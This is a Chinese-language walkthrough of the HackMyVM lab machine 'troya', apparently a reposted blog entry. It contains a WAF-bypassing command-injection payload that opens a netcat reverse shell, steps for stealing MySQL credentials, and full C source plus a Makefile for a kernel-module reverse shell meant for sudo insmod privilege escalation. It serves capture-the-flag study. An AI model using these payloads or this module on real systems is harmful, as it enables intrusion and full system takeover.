hackmyvm-troya
ssh://192.168.69.24 ssh ProductName:OpenSSH,Length:41,Port:22,Version:7.9p1Debian10+deb10u2,OperatingSystem:Linux,Digest:SSH-2.0-OpenSSH_7.9p1De,Info:protocol2.0
http://192.168.69.24 Port:80,Digest:ip:<inputtype="text",Length:271
打开网站,一个疑似有rce的口子
有waf,需要绕一绕
127.0.0.1|nc -e /b?n/b??? 192.168.69.1 12345
反弹shell后看到一个secret.pdf
内容是:cGF6endvcmQK
base64解码后是pazzword
顺便看看远吗是什么
$output
看看家目录
www-data@troya:/home$ ls -alt ls -alt total 20 drwxr-xr-x 3 helena helena 4096 Oct 22 2020 helena drwxr-xr-x 5 root root 4096 Oct 22 2020 . drwxr-xr-x 2 hector hector 4096 Oct 22 2020 hector drwxr-xr-x 2 paul paul 4096 Oct 22 2020 paul drwxr-xr-x 18 root root 4096 Oct 22 2020 .. www-data@troya:/home$ ls -alt hel ls -alt helena/ total 28 drwxr-xr-x 3 helena helena 4096 Oct 22 2020 . -rw------- 1 helena helena 11 Oct 22 2020 user.txt drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .local -rw-r--r-- 1 helena helena 220 Oct 22 2020 .bash_logout -rw-r--r-- 1 helena helena 3526 Oct 22 2020 .bashrc -rw-r--r-- 1 helena helena 807 Oct 22 2020 .profile drwxr-xr-x 5 root root 4096 Oct 22 2020 .. www-data@troya:/home$ ls -alt hector ls -alt hector total 20 drwxr-xr-x 5 root root 4096 Oct 22 2020 .. drwxr-xr-x 2 hector hector 4096 Oct 22 2020 . -rw-r--r-- 1 hector hector 220 Oct 22 2020 .bash_logout -rw-r--r-- 1 hector hector 3526 Oct 22 2020 .bashrc -rw-r--r-- 1 hector hector 807 Oct 22 2020 .profile www-data@troya:/home$ ls -alt paul ls -alt paul total 24 drwxr-xr-x 5 root root 4096 Oct 22 2020 .. drwxr-xr-x 2 paul paul 4096 Oct 22 2020 . -rw------- 1 paul paul 51 Oct 22 2020 .Xauthority -rw-r--r-- 1 paul paul 220 Oct 22 2020 .bash_logout -rw-r--r-- 1 paul paul 3526 Oct 22 2020 .bashrc -rw-r--r-- 1 paul paul 807 Oct 22 2020 .profile www-data@troya:/home$
服务器上还开了mysql,虽然网站没用到,因此mysql应该是一个有用的点,先试试看pazzword哪里有用
www-data@troya:/home$ su hector su hector Password: pazzword
su: Authentication failure www-data@troya:/home$ su helena su helena Password: pazzword
su: Authentication failure www-data@troya:/home$ su paul su paul Password: pazzword
su: Authentication failure www-data@troya:/home$ mysql mysql ERROR 1045 (28000): Access denied for user 'www-data'@'localhost' (using password: NO) www-data@troya:/home$ mysql -uroot mysql -uroot ERROR 1698 (28000): Access denied for user 'root'@'localhost' www-data@troya:/home$ mysql -uhector mysql -uhector ERROR 1045 (28000): Access denied for user 'hector'@'localhost' (using password: NO) www-data@troya:/home$ mysql -uroot -p mysql -uroot -p Enter password: pazzword
ERROR 1698 (28000): Access denied for user 'root'@'localhost' www-data@troya:/home$ mysql -uhector -p mysql -uhector -p Enter password: pazzword
Welcome to the MariaDB monitor. Commands end with ; or g. Your MariaDB connection id is 40 Server version: 10.3.25-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.
MariaDB [(none)]>
实测是mysql的密码
MariaDB [(none)]> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | yo | +--------------------+ 2 rows in set (0.005 sec)
MariaDB [(none)]> use yo use yo Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed MariaDB [yo]> show tables; show tables; +--------------+ | Tables_in_yo | +--------------+ | lucky | +--------------+ 1 row in set (0.002 sec)
MariaDB [yo]> select * from lucky; select * from lucky; +----+--------+--------------------+ | id | uzer | pazz | +----+--------+--------------------+ | 1 | helena | iuyqwejkhdsaiuyewq | +----+--------+--------------------+ 1 row in set (0.002 sec)
MariaDB [yo]>
通过mysql发现了helena的密码是iuyqwejkhdsaiuyewq
登录成功获取user.txt - pleasestop
helena@troya:~$ sudo -l Matching Defaults entries for helena on troya: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User helena may run the following commands on troya: (ALL) NOPASSWD: /usr/sbin/insmod helena@troya:~$
insmod的提权就有难度了
insmod是加载驱动,加载的是ko文件
要编译一个反弹shell的ko
先装驱动
apt install linux-headers-4.19.0-12-amd64 linux-image-4.19.0-12-amd64 build-essential
// reverse-shell.c
#include <linux/kmod.h> #include <linux/module.h> #include <linux/init.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("AttackDefense"); MODULE_DESCRIPTION("LKM reverse shell module"); MODULE_VERSION("1.0"); char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.69.1/9001 0>&1", NULL}; static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL}; static int __init reverse_shell_init(void) { int called; printk(KERN_INFO "Startingn"); called = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); printk("ret=%dn", called); return called; } static void __exit reverse_shell_exit(void){ printk(KERN_INFO "Exitingn"); } module_init(reverse_shell_init); module_exit(reverse_shell_exit);
Makefile
obj-m +=reverse-shell.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
编译反弹shell文件,最后
sudo insmod reverse-shell.ko
加载即可反弹shell
然而要注意内核版本要一致 uname -a看到的是4.19版本,我的虚拟机看了一圈都不是4.19,还要为这个搞个一致的虚拟机才能生成,算了算了,直接读root.txt - partyishard
摘要提取:
-
SSH服务信息:
-
地址:ssh://192.168.69.24 -
产品:OpenSSH 7.9p1 Debian 10 -
操作系统:Linux -
Web服务发现:
-
HTTP服务:http://192.168.69.24 -
存在疑似RCE漏洞的表单(输入IP执行命令) -
绕过WAF后通过 127.0.0.1|nc -e /b?n/b??? 192.168.69.1 12345
反弹Shell -
敏感信息泄露:
-
发现 secret.pdf
,内容为Base64编码的cGF6endvcmQK
,解码后得到密码pazzword
。 -
通过密码 pazzword
登录MySQL用户hector
,发现数据库yo
中存储了用户helena
的密码iuyqwejkhdsaiuyewq
。 -
权限提升:
-
使用密码 iuyqwejkhdsaiuyewq
登录用户helena
,获取user.txt
内容为pleasestop
。 helena
可通过 sudo
无密码执行/usr/sbin/insmod
(加载内核模块)。-
计划编译恶意内核模块( .ko
文件)实现提权,但因内核版本不匹配未实际执行,直接读取root.txt
内容为partyishard
。 -
关键代码:
-
Web表单PHP代码存在命令注入漏洞,黑名单过滤部分特殊字符(如 "%;<>^
等),但可通过管道符|
绕过。 -
反弹Shell的内核模块代码(C语言)及Makefile已提供。
总结:
攻击路径为:Web命令注入 → 反弹Shell → MySQL密码泄露 → 用户helena
提权 → 内核模块加载提权(未实际执行) 最终获取root.txt
。
原文始发于微信公众号(BlueIris):hackmyvm-troya
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论